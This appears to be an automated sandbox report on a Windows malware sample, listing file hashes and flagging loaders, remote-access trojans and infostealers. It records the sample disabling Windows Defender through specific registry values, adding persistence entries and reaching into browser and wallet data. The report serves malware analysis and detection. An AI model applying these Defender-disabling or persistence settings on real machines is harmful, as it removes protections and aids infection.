SHA512 998104d6d571d83580b96c124ec76acbffb4db7f3fdcde0ec0f3c9c37e6480851b5469fb22ea5baa26862dc4fa3a7100b504aefd34b1e5e15d5ce8ec334ef5b3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0fa1881fe360c343ca76be889bd09846
SHA1 b5ecda19949ef63fe0fe02387876924cf81e6e67
SHA256 1c4662ce8e801d5643f2ddc99e67b741a25de4fb70daa04a5ac5cae6f438e503
SHA512 f5d05f5883a08ef7dcf250cb6a9d982ad586248091912adbf2624b1cd3287edef3eea578e2b2483f5aaa4438b18f5d6485c8617cd1a73deec1c293f7271943f7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 430f767f592ef1987ffc2bde8d09aa2b
SHA1 fbddbd9152157795319e5a369fb77316bb1dbb7b
SHA256 1b99d9c20f67238f5074f35e3c15699c71da383a94df30703287995009360660
SHA512 c0c9e7941ec6b27d2db8a4bad1eb045927c794d859da2dcf01f728975a8a00d87f1092e4cd4daadc1353ef35f3df1ffbad198909a885a00a6db38f3b3e7f14be

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_7D28090A46C74E41A9A3E66B91EADD47

MD5 ca01438eb7b4ed4e0d143c4276072aac
SHA1 99a5758ec4a7e57d917ecde7111fc2e037731bd2
SHA256 0800ccc4431efa2edf777da4bbd32de945a086d93544ebe7f4ca49535e043add
SHA512 913d894fba0b51b81772f39f90eaf4a3eeb85764526e9ec38a96ceaa10e51abdd9d9e74a35d1c8a8106e1d582de0b0f2ddb3d6ba55cd7a76f25a020f35434880

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7c92fb2d6181427d8ab053266ffb3d8f
SHA1 678f7707915dd53e1437a1df00aa00a9b6a8e30e
SHA256 6201e2169dd4f70809cd6e54d59376bdb93badaf12593b0624d3e5f0b58ccb50
SHA512 ce29057a002b881c3368966a052ee7fc9f591cd3e75c6036f917477233a694205a398d7e610003cbdb2db6ee7723aaf03d2ef4196f0948aa6220c163af6df160

memory/1340-1273-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1340-1274-0x0000000004490000-0x0000000004D7B000-memory.dmp

memory/3008-1308-0x0000000070760000-0x0000000070E4E000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fc8ff2ccfb044ac480d7caf8ab4cf4dc
SHA1 6ec10c10f5fd3f7e0254e98d6a28f358387527ed
SHA256 2e0143868d0d19092c0efa4e858fe64a1085d23782d27db9a5d5aadd6fa20322
SHA512 1cd72d001fcb01d7d4227cd734b6620047f36ac06cdd5a4e5bef989515d0c386051a09de8bfc684be2fca205454637fb723ea21766cfd2fbd2e6bd9309ffa59f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5d861084345ba22b1047b46f852b5162
SHA1 266a5c51285fa13bc4381b5aae0c00a08ddc5582
SHA256 c6c1fe5cdc4e04c0d90e596500fbea40df2bc192b37f4962b7d7bb632686e215
SHA512 d07ff12523adf25dec4c9d70ef60219d9d6542b784bb6960cac0c3e2e25df1fe278eb2a10dda3ed42950ed2ecffd1694cbf537f250eda71a1aac7a6a4414bac5

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2P314ZXV\hLRJ1GG_y0J[1].ico

MD5 8cddca427dae9b925e73432f8733e05a
SHA1 1999a6f624a25cfd938eef6492d34fdc4f55dedc
SHA256 89676a3fb8639d6531c525e5800ff4cc44d06d27ff5607922d27e390eb5b6e62
SHA512 20fbee2886995c253e762f2bb814ad16890b0989deab4d92394363ef0060b96a634d87c380c7ba1b787a8ab312be968fed9329a729b4e0d64235a09e397db740

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 00145157899528ffb5f1d20d3c713b79
SHA1 88751d7170934e037774e7e2f3db692101bf30e2
SHA256 85443e6c65997ea0d59dacbdec2fd4cdf1da6a7270b56b0e9afda0c6e2f7964e
SHA512 83d1b130ed99e4155194be93d134bf324592e021d92924e829f9b31dab7f87b32e4111a4fd5426237d80b96920bcb2bfe5965a8cb785fe6e933fdc390333d5d1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8fa01be33ab2fcc582110b407bd91832
SHA1 f4be951b4b2e55716f3e80eddfb4145c08abce2a
SHA256 044a60e5c061e00fcf50848a6862d6474e8ef91fdfcfd8dbd85692cb310dfefd
SHA512 779c9aa99f78883dc717d4fa81b979f73ec061e82de2074e6d9631250c85d6ed591835c224c9ba98fa50edad550ae9eba2ae015ea0106da58b12b9938c3b8702

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8fa01be33ab2fcc582110b407bd91832
SHA1 f4be951b4b2e55716f3e80eddfb4145c08abce2a
SHA256 044a60e5c061e00fcf50848a6862d6474e8ef91fdfcfd8dbd85692cb310dfefd
SHA512 779c9aa99f78883dc717d4fa81b979f73ec061e82de2074e6d9631250c85d6ed591835c224c9ba98fa50edad550ae9eba2ae015ea0106da58b12b9938c3b8702

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 657e3ecd54d1896fd65faddce5559c22
SHA1 8ccd25e971245b21bae11d90f95568e7d739038b
SHA256 83185c3e229230badad431a544b0d8782fd65f6cf3dc9f4c35f9ff8728aab0e5
SHA512 f12149360e5856c39ccbbf8f9bb056eda2e29bacbc8d0a722ea95f8cd0ecc2c96749e5362cd2277e8c37c38bbe93618bd1e0ddebefd982860ec1f10a0cca2853

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3f098b4f2410740dee516136e61e9025
SHA1 dee6ed83bc12a869e665bcbe8c880c192c04f8a0
SHA256 33264d22efaa6f0a944b32f76b1d8175478ecdd53acedfc39e28702af2eb439c
SHA512 ebf828b6efcb14102e0ca48a64a6fef65662139dff22daf22e91cef0b3a2be9e3e1a625b18418b6979dc18a2f02ab9d2265b41bfe4f9f31e7376c1b9f6245a82

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 139fa390c265b281327135a72696108a
SHA1 15a999824a688c1d69b7a8212c3cfef1738ac491
SHA256 14b252eec1db3dc344cc828ae85010b889ce5b75f55a67851fbe9bbc3b3ae6fb
SHA512 8449f261edfb7062bfc0b807a94e787538243ec9ab47040e0ae6c715601b0926e911c53d4b118fb488b8f79fcef29b972651b42f312aaef50d343087899e8ff9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4c260e5686c9b68ded9c5a325f654770
SHA1 62ebfd525ce013a29b001998cc9c8f83d11525e8
SHA256 37d127ebf3860af46dde9139dd0c5c0eabf9c89729a4aece0a2adf84b4abaeaf
SHA512 f55eff57ad634677c94b42209dd8e9acc6119aaa3869e13519137ff3b56b2c9f60574719906934f4ef41953a7e4bcaeb3502c76e0579b865056f14ef3b7da032

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 959a57396c614c6afdb4b07cf6835276
SHA1 c966df9685f891b8c0d8f2175a5c89cf0f0fb1fe
SHA256 fdb2a47c5f77e54102ea9e5391bf361bb989a5f181a4681c818f3e32ca5acdc7
SHA512 033e12c4795d91911c7b8bf85ed92064f1b05f85a395adf60cc90d0c3c25e8c6d3825937d5d80e76e22fc5b03fef450940aa55d27de4c3bb4f250847d6917fbd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2d436dddde0d047bcb19ae11fe6f0aa9
SHA1 97320f8ec01481dd46c7d8c7e81a960f187d7929
SHA256 d4c0bd84d506a2813685d9381dbac1f1b364cd8fae86de8547fa4292dbef6b6b
SHA512 db0986998338415b68d6cb4c076b0e163dce2b1b750d922ecb16f67f62f3b6e45e88844bbfe3fdd4d6fc8ecd14586baa1153269d923fab20317e80d86b944f0b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 13edabe6181db4f9849ff7ca6da1591b
SHA1 2f4ff120bbbc84b320f65690a804bfa91d64d039
SHA256 a2dfc0193842fe6f9ca7182bd43f62ac3a478084e57a6195f42d2981bada9600
SHA512 9a79cc06c7b8c50d22c1c7e12c7c07f85c185ee43b311bcbfb18b3a391afd3cc40af4bfd61014e64d822f2ebfe6c55f7f399ce4db72f57b3c78414e15b845336

memory/3008-1760-0x0000000001150000-0x0000000001190000-memory.dmp

memory/688-1721-0x000000013F480000-0x000000013FA21000-memory.dmp

memory/1340-1761-0x0000000000400000-0x000000000266D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-10 20:34

Reported

2023-10-10 20:54

Platform

win10v2004-20230915-en

Max time kernel

102s

Max time network

163s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Detect Mystic stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\4824.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\4824.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\4824.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\4824.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\4824.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\4824.exe N/A

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\86D5.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\4563.bat N/A
Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\4AD4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\436D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WS5OY2lM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bB1Ol2hS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4563.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\em6sS5Wk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4777.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\FY0Vk8iU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4824.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZO32QK3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4AD4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2kf426Vj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86D5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B836.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B9AE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBC3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\4824.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bB1Ol2hS.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\em6sS5Wk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\FY0Vk8iU.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\436D.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WS5OY2lM.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\4824.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
